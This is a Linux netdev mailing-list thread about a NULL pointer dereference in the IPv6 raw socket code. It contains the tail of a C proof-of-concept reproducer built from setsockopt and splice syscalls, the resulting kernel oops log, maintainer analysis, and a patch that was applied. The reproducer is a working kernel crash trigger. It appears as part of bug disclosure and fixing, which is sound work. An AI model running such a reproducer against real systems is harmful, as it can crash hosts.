memcpy((void*)0x20000f4b, "\xf9\x32\x02\x55\x16\x7d\x27\xa7\x10\xb9\x5f\x81\x8f\xd7\x1b\x73\x48\x9c\xd9\x2f\xc3\x7f\x97\x0f\xee\xb1\x85\x97\xa5\x25\x71\xa2\x0b\xe3\x07\x28\x54\x44\xd9\x00\x36\xa4\xbf\xf0\x78\x15\x93\x9f\xe8\x90\x80\x4b\xd8\x6d\x60\x81\x6b\x85\xfa\xec\xf0\x44\x46\xe7\x2b\x58\xbd\x62\xcd\x28\x30\x64\x0c\xad\xaf\x33\x9d\x07\xb2\xd8\xe7\x61\x10\x5b\x3c\x32\x87\x22\x68\x0b\xee\xb4\xd8\xa3\x96\x77\xe2\xbb\xc1\xd6\x91\x03\x68\x07\x82\xe1\xd7\x9f\x95\x9e\x45\x96\x96\xb3\xfa\x62\xe5\xec\xda\x85\x69\xd8\x58\xc0\x7e\xbb\xe2\x3c\x96\xa8\xe6\x52\x7f\x24\xc5\xfd\xd7\xde\x46\xf0\xd9\x7e\x48\xe9\x5c\x84\x97\x11\x9e\x6c\xb0\xf2\xe2\xc5\xf5\xf7\x11\xcb\x46\x08\x72\xdc\xf8\x6f\xbd\x17\xc5\x8e\xeb\x83\x4d\x4b\x55\xbf\x6c\x69\xce\xf5\x53\xe3\x2b\x79\xc7\xdd\x56\x36\xd7\xa4\x0b\x1d\x1a\x1e\xf8\x58\x5d\x32\xd2\xb3\x69\xc7\x1a\x25\xf1\x75\x1a\x2c\x45\xd1\xcf\x12\xae\xce\x95\xaa", 214);
*(uint8_t*)0x20001021 = 5;
*(uint8_t*)0x20001022 = 0;
*(uint8_t*)0x20001023 = 1;
*(uint8_t*)0x20001024 = 1;
*(uint8_t*)0x20001025 = 0;
*(uint8_t*)0x20001026 = 5;
*(uint8_t*)0x20001027 = 2;
*(uint16_t*)0x20001028 = htobe16(1);
*(uint8_t*)0x2000102a = 4;
*(uint8_t*)0x2000102b = 1;
*(uint8_t*)0x2000102c = 5;
*(uint8_t*)0x2000102d = 5;
*(uint8_t*)0x2000102e = 2;
*(uint16_t*)0x2000102f = htobe16(4);
	syscall(__NR_setsockopt, r[3], 0x29, 0x3b, 0x20000f00ul, 0x138ul);
	syscall(__NR_splice, r[0], 0ul, r[2], 0ul, 0x804ffe2ul, 0ul);

}
int main(void)
{
		syscall(__NR_mmap, 0x1ffff000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul);
	syscall(__NR_mmap, 0x20000000ul, 0x1000000ul, 7ul, 0x32ul, -1, 0ul);
	syscall(__NR_mmap, 0x21000000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul);
			do_sandbox_none();
	return 0;
}

^ permalink raw reply	[flat|nested] 10+ messages in thread

* Re: net: ipv6: raw: fixes null pointer deference in rawv6_push_pending_frames
  2023-01-06 23:12   ` Kyle Zeng
  2023-01-06 23:57     ` Jakub Kicinski
@ 2023-01-09  8:45     ` Eric Dumazet
  2023-01-09 10:05       ` Herbert Xu
  1 sibling, 1 reply; 10+ messages in thread
From: Eric Dumazet @ 2023-01-09  8:45 UTC (permalink / raw)
  To: Kyle Zeng, Herbert Xu
  Cc: Jakub Kicinski, davem, yoshfuji, dsahern, pabeni, netdev

On Sat, Jan 7, 2023 at 12:13 AM Kyle Zeng <zengyhkyle@gmail.com> wrote:
>
> Hi Jakub,
>
> The null dereference can happen if every execution in the loop enters
> the `if (offset >= len) {`branch  and directly `continue` without
> running `csum_skb = skb`.
> A crash report is attached to this email.

OK, but it seems we would be in an error condition, and would need to
purge sk_write_queue ?

(ie call ip6_flush_pending_frames(), and return some error, instead of 0

Also please add a
Fixes: 357b40a18b04 ("[IPV6]: IPV6_CHECKSUM socket option can corrupt
kernel memory")
Cc: Herbert Xu <herbert@gondor.apana.org.au>

>
> Best,
> Kyle Zeng
>
> =============================================
> [    7.203616] BUG: kernel NULL pointer dereference, address: 00000000000000b2
> [    7.205204] #PF: supervisor read access in kernel mode
> [    7.206448] #PF: error_code(0x0000) - not-present page
> [    7.207630] PGD 88d0067 P4D 88d0067 PUD 79af067 PMD 0
> [    7.208060] Oops: 0000 [#1] SMP NOPTI
> [    7.208343] CPU: 1 PID: 1846 Comm: poc Not tainted 5.10.133 #39
> [    7.208816] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),
> BIOS 1.15.0-1 04/01/2014
> [    7.209489] RIP: 0010:rawv6_push_pending_frames+0x96/0x1e0
> [    7.209934] Code: 00 00 8d 57 ff 39 d0 0f 8d bc 00 00 00 48 89 7c
> 24 08 41 83 bc 24 d0 01 00 00 01 0f 85 b8 00 00 00 8b a9 88 00 00 00
> 48 89 cb <44> 0f b7 ab b2 00 00 00 44 03 ab c0 00 00 00 44 2b ab c8 00
> 00 00
> [    7.211433] RSP: 0018:ffffc90003487b10 EFLAGS: 00010246
> [    7.211859] RAX: 00000000000000d8 RBX: 0000000000000000 RCX: ffff8880064101c0
> [    7.212410] RDX: 00000000000003c0 RSI: ffff8880064101c0 RDI: 00000000090e5840
> [    7.212992] RBP: 00000000479c45b8 R08: 0000000000000000 R09: ffff8880064101a4
> [    7.213559] R10: ffff8880064103d0 R11: ffff888006524b00 R12: ffff888006410000
> [    7.214106] R13: ffffc90003487c10 R14: ffffc90003487c10 R15: 0000000000000000
> [    7.214653] FS:  00000000017e03c0(0000) GS:ffff88803ec80000(0000)
> knlGS:0000000000000000
> [    7.215272] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> [    7.215769] CR2: 00000000000000b2 CR3: 0000000009068006 CR4: 0000000000770ee0
> [    7.216318] PKRU: 55555554
> [    7.216532] Call Trace:
> [    7.216744]  rawv6_sendmsg+0x72c/0x7d0
> [    7.217041]  kernel_sendmsg+0x7a/0x90
> [    7.217325]  sock_no_sendpage+0xc1/0xe0
> [    7.217644]  kernel_sendpage+0xa3/0xe0
> [    7.217945]  sock_sendpage+0x23/0x30
> [    7.218224]  pipe_to_sendpage+0x76/0xa0
> [    7.218529]  __splice_from_pipe+0xe5/0x200
> [    7.218870]  ? generic_splice_sendpage+0xa0/0xa0
> [    7.219263]  generic_splice_sendpage+0x72/0xa0
> [    7.219650]  do_splice+0x4ad/0x780
> [    7.219928]  __se_sys_splice+0x162/0x210
> [    7.220231]  do_syscall_64+0x31/0x40
> [    7.220518]  entry_SYSCALL_64_after_hwframe+0x61/0xc6
> [    7.220944] RIP: 0033:0x47656d
> [    7.221189] Code: c3 e8 47 28 00 00 0f 1f 80 00 00 00 00 f3 0f 1e
> fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24
> 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89
> 01 48
> [    7.222645] RSP: 002b:00007ffd36d11668 EFLAGS: 00000216 ORIG_RAX:
> 0000000000000113
> [    7.223266] RAX: ffffffffffffffda RBX: 000000002000102f RCX: 000000000047656d
> [    7.223860] RDX: 0000000000000007 RSI: 0000000000000000 RDI: 0000000000000005
> [    7.224414] RBP: 00007ffd36d116a0 R08: 000000000804ffe2 R09: 0000000000000000
> [    7.224986] R10: 0000000000000000 R11: 0000000000000216 R12: 0000000000000001
> [    7.225546] R13: 00007ffd36d118d8 R14: 00000000005026c0 R15: 0000000000000002
> [    7.226112] Modules linked in:
> [    7.226350] CR2: 00000000000000b2
> [    7.226613] ---[ end trace 5d56aba11d09b665 ]---
> [    7.226993] RIP: 0010:rawv6_push_pending_frames+0x96/0x1e0
> [    7.227442] Code: 00 00 8d 57 ff 39 d0 0f 8d bc 00 00 00 48 89 7c
> 24 08 41 83 bc 24 d0 01 00 00 01 0f 85 b8 00 00 00 8b a9 88 00 00 00
> 48 89 cb <44> 0f b7 ab b2 00 00 00 44 03 ab c0 00 00 00 44 2b ab c8 00
> 00 00
> [    7.228918] RSP: 0018:ffffc90003487b10 EFLAGS: 00010246
> [    7.229322] RAX: 00000000000000d8 RBX: 0000000000000000 RCX: ffff8880064101c0
> [    7.229880] RDX: 00000000000003c0 RSI: ffff8880064101c0 RDI: 00000000090e5840
> [    7.230516] RBP: 00000000479c45b8 R08: 0000000000000000 R09: ffff8880064101a4
> [    7.231112] R10: ffff8880064103d0 R11: ffff888006524b00 R12: ffff888006410000
> [    7.231687] R13: ffffc90003487c10 R14: ffffc90003487c10 R15: 0000000000000000
> [    7.232250] FS:  00000000017e03c0(0000) GS:ffff88803ec80000(0000)
> knlGS:0000000000000000
> [    7.232912] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> [    7.233376] CR2: 00000000000000b2 CR3: 0000000009068006 CR4: 0000000000770ee0
> [    7.233958] PKRU: 55555554
> [    7.234170] Kernel panic - not syncing: Fatal exception
> [    7.234762] Kernel Offset: disabled
> [    7.235062] Rebooting in 1000 seconds..
>
> On Fri, Jan 6, 2023 at 3:55 PM Jakub Kicinski <kuba@kernel.org> wrote:
> >
> > On Fri, 6 Jan 2023 14:19:52 -0700 Kyle Zeng wrote:
> > > It is posible that the skb_queue_walkloop does not assign csum_skb to a real skb.
> >
> > Not immediately obvious to me how that could happen given prior checks
> > in this function.

^ permalink raw reply	[flat|nested] 10+ messages in thread

* Re: net: ipv6: raw: fixes null pointer deference in rawv6_push_pending_frames
  2023-01-09  8:45     ` Eric Dumazet
@ 2023-01-09 10:05       ` Herbert Xu
  2023-01-09 10:08         ` Eric Dumazet
  0 siblings, 1 reply; 10+ messages in thread
From: Herbert Xu @ 2023-01-09 10:05 UTC (permalink / raw)
  To: Eric Dumazet
  Cc: Kyle Zeng, Jakub Kicinski, davem, yoshfuji, dsahern, pabeni, netdev

On Mon, Jan 09, 2023 at 09:45:14AM +0100, Eric Dumazet wrote:
> 
> OK, but it seems we would be in an error condition, and would need to
> purge sk_write_queue ?

No the bug is elsewhere.  We already checked whether the offset
is valid at the top of the function:

	total_len = inet_sk(sk)->cork.base.length;
	if (offset >= total_len - 1) {
		err = -EINVAL;
		ip6_flush_pending_frames(sk);
		goto out;
	}

So we should figure out why the socket cork queue contains less
data than it claims.

Do we have a reproducer?

Thanks,
-- 
Email: Herbert Xu <herbert@gondor.apana.org.au>
Home Page: http://gondor.apana.org.au/~herbert/
PGP Key: http://gondor.apana.org.au/~herbert/pubkey.txt

^ permalink raw reply	[flat|nested] 10+ messages in thread

* Re: net: ipv6: raw: fixes null pointer deference in rawv6_push_pending_frames
  2023-01-09 10:05       ` Herbert Xu
@ 2023-01-09 10:08         ` Eric Dumazet
  2023-01-10  0:59           ` [PATCH] ipv6: raw: Deduct extension header length " Herbert Xu
  0 siblings, 1 reply; 10+ messages in thread
From: Eric Dumazet @ 2023-01-09 10:08 UTC (permalink / raw)
  To: Herbert Xu
  Cc: Kyle Zeng, Jakub Kicinski, davem, yoshfuji, dsahern, pabeni, netdev

On Mon, Jan 9, 2023 at 11:05 AM Herbert Xu <herbert@gondor.apana.org.au> wrote:
>
> On Mon, Jan 09, 2023 at 09:45:14AM +0100, Eric Dumazet wrote:
> >
> > OK, but it seems we would be in an error condition, and would need to
> > purge sk_write_queue ?
>
> No the bug is elsewhere.  We already checked whether the offset
> is valid at the top of the function:
>
>         total_len = inet_sk(sk)->cork.base.length;
>         if (offset >= total_len - 1) {
>                 err = -EINVAL;
>                 ip6_flush_pending_frames(sk);
>                 goto out;
>         }
>
> So we should figure out why the socket cork queue contains less
> data than it claims.
>
> Do we have a reproducer?

Kyle posted one in https://lore.kernel.org/netdev/Y7s%2FFofVXLwoVgWt@westworld/

Thanks.

>
> Thanks,
> --
> Email: Herbert Xu <herbert@gondor.apana.org.au>
> Home Page: http://gondor.apana.org.au/~herbert/
> PGP Key: http://gondor.apana.org.au/~herbert/pubkey.txt

^ permalink raw reply	[flat|nested] 10+ messages in thread

* [PATCH] ipv6: raw: Deduct extension header length in rawv6_push_pending_frames
  2023-01-09 10:08         ` Eric Dumazet
@ 2023-01-10  0:59           ` Herbert Xu
  2023-01-11 12:50             ` patchwork-bot+netdevbpf
  0 siblings, 1 reply; 10+ messages in thread
From: Herbert Xu @ 2023-01-10  0:59 UTC (permalink / raw)
  To: Eric Dumazet
  Cc: Kyle Zeng, Jakub Kicinski, davem, yoshfuji, dsahern, pabeni, netdev

On Mon, Jan 09, 2023 at 11:08:08AM +0100, Eric Dumazet wrote:
>
> Kyle posted one in https://lore.kernel.org/netdev/Y7s%2FFofVXLwoVgWt@westworld/

Thanks for the link!

It looks like I didn't think about extension headers in the original
patch.

---8<---
The total cork length created by ip6_append_data includes extension
headers, so we must exclude them when comparing them against the
IPV6_CHECKSUM offset which does not include extension headers.

Reported-by: Kyle Zeng <zengyhkyle@gmail.com>
Fixes: 357b40a18b04 ("[IPV6]: IPV6_CHECKSUM socket option can corrupt kernel memory")
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>

diff --git a/net/ipv6/raw.c b/net/ipv6/raw.c
index c51d5ce3711c..c68020b8de89 100644
--- a/net/ipv6/raw.c
+++ b/net/ipv6/raw.c
@@ -539,6 +539,7 @@ static int rawv6_recvmsg(struct sock *sk, struct msghdr *msg, size_t len,
 static int rawv6_push_pending_frames(struct sock *sk, struct flowi6 *fl6,
 				     struct raw6_sock *rp)
 {
+	struct ipv6_txoptions *opt;
 	struct sk_buff *skb;
 	int err = 0;
 	int offset;
@@ -556,6 +557,9 @@ static int rawv6_push_pending_frames(struct sock *sk, struct flowi6 *fl6,
 
 	offset = rp->offset;
 	total_len = inet_sk(sk)->cork.base.length;
+	opt = inet6_sk(sk)->cork.opt;
+	total_len -= opt ? opt->opt_flen : 0;
+
 	if (offset >= total_len - 1) {
 		err = -EINVAL;
 		ip6_flush_pending_frames(sk);
-- 
Email: Herbert Xu <herbert@gondor.apana.org.au>
Home Page: http://gondor.apana.org.au/~herbert/
PGP Key: http://gondor.apana.org.au/~herbert/pubkey.txt

^ permalink raw reply related	[flat|nested] 10+ messages in thread

* Re: [PATCH] ipv6: raw: Deduct extension header length in rawv6_push_pending_frames
  2023-01-10  0:59           ` [PATCH] ipv6: raw: Deduct extension header length " Herbert Xu
@ 2023-01-11 12:50             ` patchwork-bot+netdevbpf
  0 siblings, 0 replies; 10+ messages in thread
From: patchwork-bot+netdevbpf @ 2023-01-11 12:50 UTC (permalink / raw)
  To: Herbert Xu
  Cc: edumazet, zengyhkyle, kuba, davem, yoshfuji, dsahern, pabeni, netdev

Hello:

This patch was applied to netdev/net.git (master)
by David S. Miller <davem@davemloft.net>:

On Tue, 10 Jan 2023 08:59:06 +0800 you wrote:
> On Mon, Jan 09, 2023 at 11:08:08AM +0100, Eric Dumazet wrote:
> >
> > Kyle posted one in https://lore.kernel.org/netdev/Y7s%2FFofVXLwoVgWt@westworld/
> 
> Thanks for the link!
> 
> It looks like I didn't think about extension headers in the original
> patch.
> 
> [...]

Here is the summary with links:
  - ipv6: raw: Deduct extension header length in rawv6_push_pending_frames
    https://git.kernel.org/netdev/net/c/cb3e9864cdbe

You are awesome, thank you!
-- 
Deet-doot-dot, I am a bot.
https://korg.docs.kernel.org/patchwork/pwbot.html



^ permalink raw reply	[flat|nested] 10+ messages in thread

end of thread, other threads:[~2023-01-11 12:50 UTC | newest]

Thread overview: 10+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2023-01-06 21:19 net: ipv6: raw: fixes null pointer deference in rawv6_push_pending_frames Kyle Zeng
2023-01-06 22:55 ` Jakub Kicinski
2023-01-06 23:12   ` Kyle Zeng
2023-01-06 23:57     ` Jakub Kicinski
2023-01-08 22:09       ` Kyle Zeng
2023-01-09  8:45     ` Eric Dumazet
2023-01-09 10:05       ` Herbert Xu
2023-01-09 10:08         ` Eric Dumazet
2023-01-10  0:59           ` [PATCH] ipv6: raw: Deduct extension header length " Herbert Xu
2023-01-11 12:50             ` patchwork-bot+netdevbpf

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).